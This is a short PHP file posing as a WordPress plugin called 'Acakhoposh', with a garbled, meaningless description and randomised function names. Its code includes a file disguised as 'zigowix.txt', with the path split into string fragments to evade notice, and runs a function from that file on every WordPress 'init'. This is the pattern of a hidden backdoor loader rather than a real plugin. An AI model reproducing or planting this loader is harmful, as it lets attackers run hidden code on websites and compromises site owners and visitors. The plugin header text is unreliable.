<?php

/**
 * Plugin Name: Acakhoposh
 * Plugin URI: https://popy.co.uk/acakhoposh
 * Description: Mph). They encouraging factories to plan activities around these
 * Version: 3.6.13
 * Author: Rey Johnnie
 * Author URI: https://popy.co.uk
 * Text Domain: acakhoposh
 * License: GPL2+
 *
 */

function ydaqud_guduxashi() {
    cadizi_upoxyguw();
}

$awiqupu = __DIR__ . '/zigowix.txt';
if (file_exists($awiqupu)) {
    include_once __DIR__ . "/zigow" . "ix.t" . "xt";
}


if (function_exists("cadizi_upoxyguw")) {
    $ujarup = new ococuc_ododamud();
    if ($ujarup->qofyte_ethykhaja()) {
        add_action('init', 'ydaqud_guduxashi');
    }
}